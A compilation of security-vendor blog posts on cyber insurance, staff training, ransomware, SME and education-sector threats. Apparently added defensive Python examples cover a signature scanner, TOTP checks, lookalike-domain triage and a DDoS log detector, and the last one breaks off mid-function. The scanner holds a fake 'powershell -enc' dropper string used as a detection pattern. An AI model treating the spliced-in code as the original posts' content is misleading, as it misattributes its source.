Cyber threats are so numerous that it’s impossible to prevent security incidents altogether.
That’s why organisations are increasingly relying on cyber insurance policies to cover the costs when data breaches and cyber attacks occur.
But just how helpful is cyber insurance? We take a look at everything you need to know in this blog.
What is cyber insurance?
Cyber insurance is a specific type of protection, helping organisations mitigate the financial costs associated with information security incidents.
These costs typically won’t be included in standard business insurance policies, which tend to cover only the damage or loss of equipment itself, rather than harm caused by a cyber security event.
How does cyber insurance work?
When a covered organisation suffers a security incident and submits a claim, the insurer will investigate and then pay out accordingly.
Security incidents cause many issues that can’t be fixed with financial reimbursement, such as the time and effort it takes to recover or the reputational damage you could face.
Likewise, the cost of a data breach is related to the speed at which organisations can detect and respond to an incident. Indeed, Ponemon Institute’s Cost of a Data Breach Report 2020 found that organisations that can address a breach within 200 days save about £750,000 compared to those that take longer to respond.
If organisations wait for their insurer to review the incident before responding, the costs will escalate, and a larger claim is likely to push up their premium.
You must therefore view cyber insurance as a complement to your cyber security defences and an extra resource to mitigate costs rather than an alternative.
What does a cyber insurance policy cover?
Cyber insurance covers the financial costs of incidents that affect the confidentiality, integrity and availability of information. This includes cyber attacks and data breaches, as well as other events that impact IT systems and networks.
Policies generally provide organisations with the means to manage the incident. This includes forensic investigation, incident response, legal assistance and public relations support.
What is not covered by cyber insurance?
Cyber insurance policies generally don’t cover damages that were caused or exacerbated by the organisation itself.
This might include business email compromise fraud or acts of gross negligence.
Likewise, some insurers won’t reimburse organisations that pay up after a ransomware attack, given that experts advise organisations not to pay because payment helps fuel the cyber crime industry and could make the organisation a soft target for future attacks.
Who needs cyber insurance?
Any organisation that relies on information technology or processes sensitive data is vulnerable to cyber attacks and data breaches, and should therefore consider cyber insurance.
You can find out whether cyber insurance is the right strategy by following ISO 27001’s risk assessment methodology, which helps organisations decide the most appropriate way to address each identified risk. The Standard gives four risk treatment options:
Modify the risk by applying security controls that will reduce the likelihood of it occurring and/or damage it will cause.
Retain the risk by accepting that it falls within previously established risk acceptance criteria, or via extraordinary decisions.
Avoid the risk by changing the circumstances that are causing it.
Share the risk with a partner, such as a cyber insurance firm or a third party that is better equipped to manage the risk.
How much does cyber insurance cost?
An AdvisorSmith study found that the average cost of cyber insurance was $1,500 (about £1,160) per year for $1 million (£770,000) in coverage.
However, the costs will vary greatly depending on the organisation’s size, industry, the amount of sensitive data it processes and the strength of its existing cyber security measures.
Some insurers may also offer different levels of protection. For example, you could pay less each month but be covered against a smaller set of damages – or vice versa.
Is my existing cyber security enough?
Organisations are free to decide whether they should purchase cyber insurance.
In most cases, there is no legal or contractual requirement to have cyber insurance, so the organisation might decide that its budget is better spent on cyber defences and business continuity management.
However, there may well be times where it makes financial sense to invest in cyber insurance, for example when the costs of a breach far exceed the amount you would be paying in coverage.
With this annual subscription service, our experts are on hand to advise you on the best way to protect your organisation.
They’ll guide you through a variety of security practices – including vulnerability scans, staff training and the creation of policies and procedures – ensuring that you have the foundations of an effective security strategy.
These measures will help you stay one step ahead of cyber criminals, preventing a wide array of threats and putting you in a position to claim competitive cyber insurance rates.
Organisations are always looking for ways to improve their security practices, and one of the most effective ways to achieve this is by enrolling employees on cyber security training courses.
A recent Lucy Security study found that 96% of respondents agreed that a greater level of awareness over cyber security threats contributed to overall improvements in their defences.
Despite that, comparatively few provided adequate training to help staff mitigate the risks of data breaches and cyber attacks.
For example, only 81% of respondents said they conduct phishing simulations, and only 51% say their organisation has a mechanism to report suspicious emails.
With October being European Cyber Security Awareness Month, there has never been a better time to boost your organisation’s knowledge of effective information security practices.
Here are two of the reasons to consider it.
1. You’ll reduce the risk of data breaches
Almost all data breaches involve a mistake somewhere in the organisation. So if you want to keep your organisation secure, your employees need to know what they’re doing.
That doesn’t only mean negligence – it could also be mistakes that you don’t even know are mistakes, such as gaps in your policies, ineffective processes or a lack of proper technological defences.
Placing staff on information security training courses will help them understand the mistakes they’re making and teach them to work more effectively.
This is especially useful if you intend to commit to a framework such as ISO 27001, the international standard for information security, as there are specific courses that teach you how to follow the Standard’s requirements.
2. You’ll meet compliance requirements
Cyber security laws and regulations inevitably contain complex requirements, so organisations need employees with specialist knowledge to achieve compliance.
Finding qualified personnel isn’t the only problem. A small pool of skilled workers also means job candidates can command a higher salary and more benefits.
As such, organisations might not be able to afford qualified professionals even if they can find them.
They should therefore do whatever they can to support employees who want to go on training courses. Organisations will almost certainly benefit from the extra knowledge, and it eases the pressure of finding skilled personnel in the job market.
Which course is right for you?
Cyber security is a broad industry, so you need to decide which area suits you best. To help you make that choice, here are some of our most popular training courses:
The GDPR is the most significant update to data protection law in more than twenty years. Anyone who handles personal data or is responsible for data protection needs to comply with its requirements.
As I reflect upon my 40 years as a cyber security professional, I think of the many instances where the basic tenets of cyber security—those we think have common understanding—require a lot of additional explanation. For example, what is a vulnerability assessment? If five cyber professionals are sitting around a table discussing this question, you will end up with seven or eight answers. One will say that a vulnerability assessment is vulnerability scanning only. Another will say an assessment is much bigger than scanning and addresses ethical hacking and internal security testing. Another will say that it is a passive review of policies and controls. All are correct in some form, but the answer really depends on the requirements or criteria you are trying to achieve. And it also depends on the skills and experience of the risk owner, auditor, or assessor. Is your head spinning yet? I know mine is! Hence the “three parts art.”
There is quite a bit of subjectivity in the cyber security business. One auditor will look at evidence and agree you are in compliance; another will say you are not. If you are going to protect sensitive information, do you encrypt it, obfuscate it, or segment it off and place it behind very tight identification and access controls before allowing users to access the data? Yes. As we advise our client base, it is essential that we have all the context necessary to make good risk-based decisions and recommendations.
Let’s talk about Connection’s artistic methodology. We start with a canvas that addresses the core components of cyber security: protection, detection, and reaction. By addressing each of these three pillars in a comprehensive way, we ensure that the full conversation around how people, process, and technology all work together to provide a comprehensive risk strategy is achieved.
Protection
People: Users understand threat and risk and know what role they play in the protection strategy. For example, if you see something, say something. Don’t let someone tailgate in behind you through a badge-check entry. And don’t think about trying to shut off your endpoint anti-virus or firewall. In today’s remote workforce environment, good employee security awareness, especially around phishing, is essential.
Process: Policies are established, documented, and socialized. For example, personal laptops should never be connected to the corporate network. Also, don’t send sensitive information to your personal email account so you can work from home.
Technology: Some examples of the barriers used to deter attackers and breaches are edge security with firewalls, intrusion detection and prevention, sandboxing, and advanced threat detection. Security leaders need to become students of threat, and deploy the correct technology to protect, detect, and react to it.
Detection
The mean time to identify an active incident in a network is 197 days. The mean time to contain an incident is 69 days.
People: Incident response teams need to be identified and trained, and all employees need to be trained on the concept of “if you see something, say something.” Detection is a proactive process.
Process: What happens when an alert occurs? Who sees it? What is the documented process for taking action?
Technology: What is in place to ensure you are detecting malicious activity? Is it tuned to ignore noise and alert you only to a real event? Will it help you bring that 197-day mean time to detection way down?
Reaction
People: What happens when an event occurs? Who responds? How do you recover? Does everyone understand their role? Do you war game to ensure you are prepared WHEN an incident occurs?
Process: What is the documented process to shorten the kill chain—the mean time to detect and contain—from 69 days to 69 minutes? Do you have a Business Continuity and Disaster Recovery Plan to ensure the ability to react to a natural disaster, a significant cyber breach such as ransomware or DDoS, or—dare I say it—a pandemic?
Technology: What cyber security consoles have been deployed that let you quickly patch a system, change firewall rules, adjust ACLs or policy settings at an endpoint, or track a security incident through the triage process?
All of these things are important to create a comprehensive InfoSec Program. The science is the technology that will help you build a layered, in-depth defense approach. The art is how to assess the threat, define and document the risk, and create a strategy that allows you to manage your cyber risk as it applies to your environment, users, systems, applications, data, customers, supply chain, third party support partners, and business process.
More Art – Are You a Risk Avoider or Risk Transference Expert?
A better way to state that is, “Do you avoid all risk responsibility, or do you give your risk responsibility to someone else?” Hint: I don’t believe in risk avoidance or risk transference.
Yes, there is an art to risk management. There is also science if you use, for example, the Carnegie Mellon risk tools. But a good risk owner and manager documents risk, prioritizes it by risk criticality, turns it into a risk register or roadmap plan, remediates what is necessary, and accepts what is reasonable from a business and cyber security perspective. Oh, by the way, those same five cyber security professionals we talked about earlier have 17 definitions of risk.
As we wrap up this conversation, let’s talk about the importance of selecting a risk framework. It’s kind of like going to a baseball game and recognizing that the program helps you know the players and the stats. What framework will you pick? Do you paint in watercolors or oils? Are you a National Institute of Standards and Technology (NIST) artist, an International Organization for Standardization (ISO) artist, or have you developed your own framework like the Nardone puzzle chart? I developed this several years ago when I was the CTO/CSO of the Commonwealth of Massachusetts. It has been artistically enhanced over the years to incorporate more security components, but it is loosely based on the NIST SP 800-53 and ISO 27001 standards.
When it comes to selecting a security framework as a CISO, I lean towards the NIST Cyber Security Framework (CSF). This framework is comprehensive and provides a scoring model that allows risk owners to measure and target what risk level they believe they need to achieve based on their business model, threat profile, and risk tolerance. It has five functional focus areas. The ISO 27001 framework is also a very solid and frequently used model. ISO 27001 is a certifiable standard: an accredited certification body can issue a certificate demonstrating adherence, and many commercial corporations do an annual ISO 27001 assessment for that very reason. The NIST CSF has no official certification scheme, although assessors produce attestation reports of alignment against it, and more and more organizations are leaning towards it, especially commercial corporations doing work with the government. Keep in mind that frameworks mature, and compliance requirements change. For example, if you are a commercial corporation doing business with the federal government, you will need to comply with the new Cybersecurity Maturity Model Certification (CMMC) soon to continue doing business with the government.
Dealing with the aftermath of ransomware attacks is like Russian roulette. Submitting the ransom might seem like it’s the sole option for recovering locked data. But paying the ransom doesn’t mean that your organization will get its affected data back. Let’s not forget that ransomware also continues to evolve as a threat category.
We’ve run through some of the essential steps in this blog; you can also download the full, free checklist from our website.
Firewalls are one of many security controls that organisations should implement to protect their systems.
They create a buffer between your IT systems and external networks by monitoring network traffic and blocking anything that could damage your computers, systems and networks.
This helps prevent cyber criminals from breaking into your networks, and an outbound rule set also blocks traffic that originates from malware already inside them, such as a connection back to an attacker’s command-and-control server.
Install antivirus software
Antivirus software is another essential technological defence – and contrary to what the name implies, it isn’t designed only to root out viruses.
Modern antivirus generally includes protection against a range of malware, including ransomware, keyloggers, Trojan horses, worms, adware and spyware.
The software works by scanning your computer or network for files that match its database of known malicious programs, typically by file hash or by characteristic byte patterns. Signature matching only catches what has already been catalogued: changing a single byte of a known sample defeats an exact-hash signature, which is why the database must be updated continuously and why more capable products add heuristic and behavioural detection on top of it.
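To make the signature-matching point concrete, here is an added example (not code from the original page or from any antivirus vendor) that scans constructed sample files two ways: an exact SHA-256 lookup against a hash database, and a content-pattern match of the kind a YARA rule expresses. The sample bytes, file names and family names are all made up for the demonstration; the one-byte variant shows why hash signatures alone are not enough.

```python
import hashlib
from dataclasses import dataclass
from pathlib import Path
from typing import Dict, Optional

# Constructed sample "files" for this example. None of this is real malware:
# the "malicious" bytes are just a recognisable marker string.
MALICIOUS = b"MZ\x90\x00" + b"evil-dropper: powershell -enc " + b"A" * 40
MALICIOUS_VARIANT = MALICIOUS[:-1] + b"B"          # identical except the last byte
BENIGN = b"Quarterly sales figures\n2020: up 4%\n"

SAMPLES: Dict[str, bytes] = {
    "report.txt": BENIGN,
    "invoice.exe": MALICIOUS,
    "invoice2.exe": MALICIOUS_VARIANT,
}

# Exact-match signature database (the "database of known malicious programs"
# the text describes), keyed by SHA-256 of the whole file. Built here from the
# constructed sample so the example runs offline.
KNOWN_BAD_SHA256: Dict[str, str] = {
    hashlib.sha256(MALICIOUS).hexdigest(): "Dropper.Example",
}

# Content signatures: byte patterns that survive small edits to the file.
PATTERN_SIGNATURES: Dict[bytes, str] = {
    b"evil-dropper": "Dropper.Example.Generic",
}


@dataclass
class Verdict:
    name: str
    method: Optional[str]     # "hash", "pattern" or None when clean
    family: Optional[str]


def hash_scan(data: bytes) -> Optional[str]:
    """Return the malware family if the file's SHA-256 is in the database."""
    return KNOWN_BAD_SHA256.get(hashlib.sha256(data).hexdigest())


def pattern_scan(data: bytes) -> Optional[str]:
    """Return the malware family if any content signature occurs in the file."""
    for pattern, family in PATTERN_SIGNATURES.items():
        if pattern in data:
            return family
    return None


def scan(name: str, data: bytes) -> Verdict:
    """Cheap exact-hash lookup first, then the slower content match."""
    family = hash_scan(data)
    if family:
        return Verdict(name, "hash", family)
    family = pattern_scan(data)
    if family:
        return Verdict(name, "pattern", family)
    return Verdict(name, None, None)


def scan_samples(samples: Dict[str, bytes]) -> Dict[str, Verdict]:
    return {name: scan(name, data) for name, data in samples.items()}


def scan_directory(root: Path) -> Dict[str, Verdict]:
    """Scan every regular file under root (for on-disk use; not exercised by the sample run)."""
    return {str(p): scan(str(p), p.read_bytes()) for p in root.rglob("*") if p.is_file()}


if __name__ == "__main__":
    for verdict in scan_samples(SAMPLES).values():
        status = f"{verdict.family} (by {verdict.method})" if verdict.method else "clean"
        print(f"{verdict.name}: {status}")
```

The hash lookup flags `invoice.exe` but misses `invoice2.exe`, whose single changed byte produces an entirely different digest; the pattern signature still catches it. Real products layer further heuristics and behavioural monitoring on top, because a pattern string is just as easy for an attacker to change once they know it is being matched.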
When software providers fix a vulnerability in their applications, users must download and install the update (or ‘patch’) before they are protected.
Organisations tend to use many software providers, each of which releases regular patches – Microsoft, for example, fixes vulnerabilities so often that the term ‘Patch Tuesday’ was coined.
As such, it makes sense to create a patch management plan that records which updates you’ve applied, confirms that each one installed successfully and sets a deadline for applying critical fixes.
Conduct a cyber security risk assessment
A cyber security risk assessment helps organisations evaluate their weaknesses and gain insights into the best way to address them.
ISO 27001, the international standard that sets out the specification for an ISMS (information security management system), is built around risk assessments and contains step-by-step guidance on how to complete the process.
You don’t need to certify to ISO 27001 to follow its advice – or even follow the rest of the Standard’s guidance – although doing so clearly has many benefits.
Create an information security policy
Information security policies are the output of a risk assessment. They describe the risks that have been identified and the measures that the organisation has adopted to address them.
The document should contain a thorough outline of each risk, the relevant control(s) and the organisation’s continual improvement strategy, including when and how they will review the effectiveness of the control.
Encrypt sensitive data
In an information security context, encryption is a way of ‘scrambling’ sensitive data, ensuring that it can only be accessed by authorised personnel with a decryption key.
By encrypting data, you ensure that even if criminal hackers break into your systems, they cannot read your files unless they also obtain the key. That protection depends on where the key lives: a key stored alongside the data, or a compromised account that is allowed to decrypt, gives the attacker the same access it gives you. Done properly, encryption mitigates the risk of data breaches and could prevent a GDPR (General Data Protection Regulation) violation; the Regulation also exempts organisations from notifying affected individuals when the compromised data was rendered unintelligible by encryption.
Create a remote working policy
The COVID-19 pandemic has reshaped the way organisations work, with the majority planning to permanently switch to remote working – whether that’s on a full-time basis or giving employees the opportunity to come into the office a few days a week.
As you will no doubt know, remote working comes with unique information security challenges, which you’ll need to address in a dedicated policy.
This will include guidance on storing devices securely, creating and maintaining strong passwords, and an acceptable use policy for visiting websites that aren’t work-related.
Organisations should also explain the technical solutions that they’ve implemented to protect sensitive data and how employees can comply with them. For example, we recommend applying two-factor authentication to any third-party service that you use.
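As an added example of the two-factor authentication recommended above (not code from the original page, and not tied to any particular third-party service), the following implements the time-based one-time passwords (RFC 6238) that authenticator apps generate, plus the server-side check. The shared secret is the RFC’s own test-vector secret so the output can be verified against the published values; a real deployment draws a random per-user secret from `os.urandom`. The function and parameter names are this example’s own.

```python
import base64
import hashlib
import hmac
import struct
import time
from typing import Optional

# Shared secret from the RFC 6238 Appendix B test vectors (ASCII "12345678901234567890").
# Used here only so the output can be checked against the RFC; a real secret is
# 20+ random bytes from os.urandom, stored per user and never reused.
RFC_SECRET = b"12345678901234567890"


def hotp(secret: bytes, counter: int, digits: int = 6, algorithm=hashlib.sha1) -> str:
    """RFC 4226 HOTP: HMAC over the 8-byte big-endian counter, then dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), algorithm).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret: bytes, timestamp: Optional[float] = None,
         step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP with counter = floor(unix_time / step)."""
    if timestamp is None:
        timestamp = time.time()
    return hotp(secret, int(timestamp) // step, digits)


def verify_totp(secret: bytes, submitted: str, timestamp: Optional[float] = None,
                step: int = 30, digits: int = 6, window: int = 1,
                last_used_counter: int = -1) -> Optional[int]:
    """Server-side check. Returns the matched counter, or None if the code is rejected.

    window=1 accepts the previous and next time step to absorb clock drift.
    The caller persists the returned counter and passes it back as
    last_used_counter, so a code that was already accepted cannot be replayed
    while it is still inside the window. Comparison is constant-time.
    """
    if timestamp is None:
        timestamp = time.time()
    counter = int(timestamp) // step
    for candidate in range(counter - window, counter + window + 1):
        if candidate <= last_used_counter:
            continue
        if hmac.compare_digest(hotp(secret, candidate, digits), submitted):
            return candidate
    return None


def provisioning_uri(secret: bytes, account: str, issuer: str,
                     digits: int = 6, step: int = 30) -> str:
    """otpauth:// URI, which is what an authenticator app reads from the enrolment QR code."""
    b32 = base64.b32encode(secret).decode("ascii").rstrip("=")
    return (f"otpauth://totp/{issuer}:{account}?secret={b32}"
            f"&issuer={issuer}&algorithm=SHA1&digits={digits}&period={step}")


if __name__ == "__main__":
    print(provisioning_uri(RFC_SECRET, "alice", "Example"))
    print("code at T=59:", totp(RFC_SECRET, 59))
```

Two details matter in practice and are easy to get wrong: the code must be compared with `hmac.compare_digest` rather than `==`, and the last accepted counter must be stored, otherwise an attacker who phishes a code can reuse it for the rest of the 30-second window and the drift window on either side.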
Conduct vulnerability scans
Many cyber attacks are automated, with criminals searching for and exploiting known vulnerabilities.
Organisations can prevent these attacks by conducting their own scans to identify weaknesses before crooks exploit them.
But that’s not the only benefit of vulnerability scanning. The process also helps you gauge the overall effectiveness of your security measures, saving you time and money in the long run.
Conduct penetration tests
Penetration tests are a controlled form of hacking in which a cyber security professional, working on behalf of an organisation, attempts to find and exploit vulnerabilities in the same way that a criminal would.
These tests are more rigorous than automated scans, because the tester can chain weaknesses together and show how a criminal might actually reach your sensitive information, rather than just listing what is vulnerable.
Penetration testers may, for example, exploit system misconfigurations or send staff phishing emails to gather login credentials.
With the vulnerabilities the ethical hacker discovers, organisations can implement defences to stop criminals before they’ve had a chance to target the organisation.
Create a business continuity plan
A business continuity plan outlines the steps an organisation must take to ensure its critical processes continue operating in the event of a major disruption.
This information is put into a document, which is regularly tested, developed and improved upon to make sure the organisation has recovery strategies in place for a range of threats.
Download our free checklist
You can learn more about the steps you should take to prevent and respond to cyber security incidents by downloading our Cyber Security Risk Scorecard.
This free document contains twenty questions you should ask yourself to determine whether you have the necessary defences in place.
It’s designed to give a broad indication of your organisation’s overall readiness, helping you understand what your next steps should be and how urgently you need to address cyber security.
A patient at Dusseldorf University Hospital died during a ransomware infection in what is reportedly the first death directly linked to a cyber attack.
The hospital was unable to accept emergency patients because of the attack, so the woman – who needed urgent treatment for a life-threatening illness – was sent to another hospital 20 miles away, the Associated Press reported.
The ransom note was addressed to a nearby university, which suggests that the attackers weren’t aware that they had infected one of the largest hospitals in western Germany.
The criminals stopped their attack when they learned that it had shut down the hospital, but by then the damage had been done.
Although it might be easy to chalk this up as unfortunate, you could just as easily say that it was only a matter of time until something like this happened.
Arne Schönbohm, president of the Federal Office for Information Security, confirmed that the attack exploited a vulnerability in a Citrix VPN system, which the hospital had been aware of since December 2019.
“I can only urge you not to ignore or postpone such warnings but to take appropriate action immediately,” said Schönbohm. “This incident shows once again how seriously this danger must be taken.”
Same old story
The healthcare sector has been a lucrative target for cyber criminals for years, due to its apparent unwillingness to commit to better defences and, in particular, its widespread use of legacy systems.
The UK saw the damage that can occur when relying on legacy systems with the WannaCry attack in 2017.
Many NHS devices were still running unsupported or unpatched versions of Windows, including Windows XP, which Microsoft had stopped supporting in 2014 – and it was an unpatched Windows SMB vulnerability that exposed 80 NHS trusts and led to £92 million in damages.
Given the spate of attacks on hospitals during the coronavirus pandemic – both in the UK and the rest of the world – you would have thought it was only a matter of time before we were no longer talking about just the financial and logistical issues caused by cyber attacks, but the human cost.
Hopefully this incident will be a wake-up call for hospitals, which desperately need to prioritise security strategies and realise that cyber attacks can be just as damaging as physical assaults.
If you’re an SME, cyber security might seem impossibly complex and filled with endless pitfalls.
Although it’s true that there’s a lot at stake – with ineffective security measures potentially threatening your productivity, your bank accounts, and your employees’ and third parties’ personal data – the path to effective security needn’t be difficult.
In this blog, we explain everything that small business owners need to know about protecting their organisations and reducing the risk of security breaches.
Why cyber security presents unique risks for SMEs
The difficulties that small businesses face when addressing cyber risks can be separated into financial costs and their ability to gain expert advice.
When we talk about ‘cost’, there are several issues at play. First, there is the fact that many small and medium-sized enterprises lack the budget to invest in comprehensive defences.
Second, there are the costs that organisations incur as a result of a security incident. We’ll talk about the specific financial effects of this in more detail below, but it’s worth noting that the first issue clearly affects the other.
SMEs that are reluctant to invest in cyber security practices are not only more likely to fall victim but will experience far larger costs as a result – and in many cases, the damage will be insurmountable.
You cannot cut corners when it comes to cyber threats. However tight your budget, you must find a way to address cyber security.
The second difficulty is expertise. Skilled security professionals are in short supply, so those with the necessary skills can command a much larger salary, meaning small organisations are being priced out of the market.
SMEs’ best course of action is to look internally – offering existing employees the opportunity to move into a career in cyber security.
Those with an IT background are particularly suited to this career switch, because – although technology encompasses only one aspect of information security – there is a large overlap.
Why SMEs can’t ignore cyber security
Let’s now take a closer look at the repercussions that small organisations face if they don’t properly address cyber security.
The first problem that you’ll run into is business disruption. An attack on your systems may paralyse your network or force you to close off parts of your business to make sure cyber criminals can no longer access your data.
In the time it takes you to investigate the cause of the breach and to get your systems back online, you will be unable to perform certain operations and are likely to experience a loss of productivity.
Remedial costs and regulatory fines
Getting up and running again is only your first obstacle. If the incident was serious enough, you will need to contact affected customers as well as your data protection supervisory authority, which in the UK is the ICO (Information Commissioner’s Office).
Notifying customers alone can be an expensive and time-consuming endeavour.
You may have to set up helpdesks so that those affected can get in contact to learn more, or even offer them complimentary credit monitoring to reassure them that the breach has no personal financial implications for them.
In addition to this, the ICO may well decide that the incident was a result of a GDPR (General Data Protection Regulation) violation, in which case you are liable to receive a financial penalty and face legal action.
Finally, the incident might result in long-term reputational damage. It can be hard for organisations to retain customers’ trust – and that’s particularly true for small organisations – so you may experience significant customer churn.
SMEs’ biggest vulnerability is human error. Small organisations are far less likely than larger ones to have systematic staff awareness training programmes in place, meaning there is an increased possibility of someone making an avoidable mistake.
On a similar note, employees at small organisations are more likely to act maliciously – purposely using information in a way that’s detrimental to the organisation.
One reason for this is that smaller organisations are less likely to have monitoring tools to catch them in the act. For example, they might not have implemented access controls that limit the information an employee can view, or logging that records who accessed what.
Without them, any member of staff who wanted to steal sensitive information (perhaps with the intention of selling it on the dark web) could do so, and the organisation would be unable to tell who was responsible.
Another threat that small organisations in particular are vulnerable to is ransomware. This is a type of malware in which criminal hackers encrypt files or lock users out of their systems and demand money for the decryption key.
The most effective way to mitigate the risk of ransomware is to regularly back up your files to storage that the ransomware cannot reach – offline, or on a separate system that your production network cannot write to – and to test that you can actually restore from it. Ransomware routinely encrypts any backup that is simply mapped as a network drive. With isolated backups in place, should your systems become infected, you will be able to disconnect them, wipe the data and restore your information.
This process will take some time – anywhere from a couple of days to a couple of weeks, depending on the size of your operations – but it will be much less expensive and disruptive, and is a far more prudent approach than paying a criminal and hoping that they keep their word.
Unfortunately, many SMEs don’t invest in comprehensive backup strategies, making them an ideal target for crooks.
What can you do to protect your small business from cyber threats?
Most small organisations know that they should be doing more to protect themselves, but it can be difficult knowing where to begin. That’s where our Cyber Security as a Service can help.
Cambridgeshire’s susceptibility to cyber attacks is particularly disheartening for us to hear at IT Governance, given that we’re based in the region.
We’ve helped local businesses with more than 1,000 projects, but there’s still clearly a long way to go when it comes to data protection.
One of the essential steps to cyber security is to educate your employees on the risks they face and the ways they can mitigate the risk.
Our Complete Staff Awareness E-learning Suite contains everything you need to stay secure, from organisations’ legal requirements to specific issues that employees face, such as phishing emails and social media scams.
The coronavirus pandemic has arguably affected the education sector more than any other, with schools, colleges and universities around the globe having been forced to close their doors and deliver classes remotely.
Most of the discussion surrounding this has focused on the logistical problems of setting up e-learning platforms, parents balancing their workloads with home-schooling and students completing exams.
However, one of the most significant issues – particularly in the long term – is that the pandemic has also exposed massive cyber security failings in the education sector.
Although some of the attacks described below are a direct response to schools’ ad hoc response to the pandemic, it’s not as though the education sector was especially resilient before being forced into online learning.
This is the result of schools increasingly relying on technology – whether it’s online learning platforms, teaching tools or day-to-day operations – while neglecting the security concerns that come with it.
Kaspersky notes that several bogus sites replicating Google Classroom and Zoom began popping up at the start of the pandemic.
According to Check Point Research, from the end of April to mid-June, 2,449 domains related to Zoom were registered, 32 of which were malicious and 320 were suspicious.
Fraudsters have also taken aim at Microsoft Teams and Google Meet, as well as universities’ online portals.
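A first triage of newly registered domains that borrow these brand names can be automated. The following Python script is an added example (not from the original post, Kaspersky or Check Point Research): it flags a domain as malicious-looking when a brand name appears together with a lure word or a digit-for-letter homoglyph, as suspicious when the brand appears alone, and as legitimate when it matches an allow-list. The brand list, the allow-list of legitimate domains, the lure words and the sample domains are all assumptions constructed for the example; the sample domains are not real registrations.

```python
from collections import Counter

# Brands the education sector leaned on for remote teaching (assumption for this example).
BRANDS = ("zoom", "google", "classroom", "microsoft", "teams", "meet")
# Allow-list of domains those brands legitimately use (assumption; extend from your own records).
LEGITIMATE = {"zoom.us", "classroom.google.com", "meet.google.com", "teams.microsoft.com"}
# Words fraudsters bolt onto a brand to make a lure look like an official page.
LURE_WORDS = ("login", "signin", "account", "verify", "update", "download",
              "install", "secure", "support", "meeting")
# Digit-for-letter substitutions seen in homoglyph domains.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "$": "s"})

# Constructed sample of "newly registered" domains; none of these are real registrations.
SAMPLE_DOMAINS = [
    "zoom.us", "zoom-meeting-login.com", "zoomdownload-install.net", "z00m.us",
    "g00gle-classroom.org", "teams-microsoft-support.info", "bloom.example", "zoomcraft.example",
]


def registrable_label(domain):
    """Crude registrable label: the label before the last dot (good enough for .com/.us style TLDs)."""
    labels = domain.lower().strip(".").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def classify(domain):
    """Return 'legitimate', 'malicious', 'suspicious' or 'benign' for one domain."""
    d = domain.lower().strip(".")
    if d in LEGITIMATE or any(d.endswith("." + legit) for legit in LEGITIMATE):
        return "legitimate"
    label = registrable_label(d)
    normalised = label.translate(HOMOGLYPHS)
    for brand in BRANDS:
        if brand in normalised:
            homoglyph = brand not in label          # brand only appears once digits are undone
            lure = any(word in normalised for word in LURE_WORDS)
            return "malicious" if homoglyph or lure else "suspicious"
    return "benign"


def triage(domains):
    """Classify every domain; returns {domain: verdict}."""
    return {domain: classify(domain) for domain in domains}


def summarise(verdicts):
    """Counts per verdict, the shape of the malicious/suspicious figures quoted above."""
    return Counter(verdicts.values())


if __name__ == "__main__":
    results = triage(SAMPLE_DOMAINS)
    for domain, verdict in results.items():
        print(f"{verdict:11} {domain}")
    print(dict(summarise(results)))
```

Feed it your daily newly-registered-domain feed or certificate-transparency log entries for the brands you care about. The verdicts deliberately mirror the malicious/suspicious split in the Check Point figures, but a hit is a lead for analyst review and a candidate for a proxy block-list, not proof of fraud.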
DDoS (distributed denial-of-service) attacks
Between February and June 2020, there was a 350–500% increase in DDoS attacks on the education sector compared with the same period in 2019.
These attacks, which flood a target's servers or network links with so much traffic that legitimate requests can no longer be served, are usually performed to disrupt an organisation – perhaps as an act of revenge, a political statement or simply for fun – or to distract the organisation while the attackers carry out a more sophisticated attack elsewhere.
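To see what "overwhelmed" looks like in your own telemetry, here is an added Python example (not from the original post) that reads web-server access-log lines, groups requests into ten-second windows and raises an alert when a window carries far more requests than the median window. It labels an alert "single-source" when one address accounts for most of the burst and "distributed" otherwise, which is the practical distinction between a flood you can rate-limit at the edge and one that needs upstream scrubbing. The log excerpt is constructed inside the script (documentation-range IP addresses, not real traffic); the window size and thresholds are assumptions to tune against your own baseline.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timezone
from statistics import median

# Common Log Format: client, ident, user, [timestamp], "request", status, bytes
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)"')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return (client_ip, unix_seconds) for a log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    epoch = int(datetime.strptime(m.group("ts"), TS_FMT).timestamp())
    return m.group("ip"), epoch


def bucketise(lines, window=10):
    """Group requests into fixed windows: {window_start: Counter(client_ip -> requests)}."""
    buckets = defaultdict(Counter)
    for line in lines:
        parsed = parse_line(line)
        if parsed:
            ip, epoch = parsed
            buckets[epoch - epoch % window][ip] += 1
    return buckets


def detect_floods(lines, window=10, factor=10, min_total=50):
    """Alert on windows whose request count is both >= min_total and >= factor x the median window."""
    buckets = bucketise(lines, window)
    totals = {start: sum(c.values()) for start, c in buckets.items()}
    baseline = median(totals.values()) if totals else 0
    alerts = []
    for start in sorted(buckets):
        total = totals[start]
        if total < min_total or total < factor * baseline:
            continue
        top_ip, top_hits = buckets[start].most_common(1)[0]
        # One client sending more than half the burst is a flood you can block at the edge;
        # otherwise it is spread across many sources and needs upstream mitigation.
        kind = "single-source" if top_hits > total / 2 else "distributed"
        alerts.append({"window_start": start, "requests": total, "sources": len(buckets[start]),
                       "kind": kind, "top_source": top_ip, "top_hits": top_hits})
    return alerts


def build_sample_log():
    """Constructed log (documentation IP ranges, not real traffic):
    60 s of quiet traffic, then a distributed burst, then a single-source burst."""
    base = int(datetime(2020, 5, 12, 9, 0, tzinfo=timezone.utc).timestamp())
    lines = []

    def add(ip, epoch, path="/portal/login"):
        ts = datetime.fromtimestamp(epoch, timezone.utc).strftime(TS_FMT)
        lines.append(f'{ip} - - [{ts}] "GET {path} HTTP/1.1" 200 512')

    for sec in range(0, 60, 2):                  # quiet: one request every 2 s from three users
        add(f"203.0.113.{sec % 3 + 1}", base + sec)
    for bot in range(40):                        # distributed: 40 bots, 30 hits each, in one window
        for k in range(30):
            add(f"198.51.100.{bot + 1}", base + 60 + k % 10)
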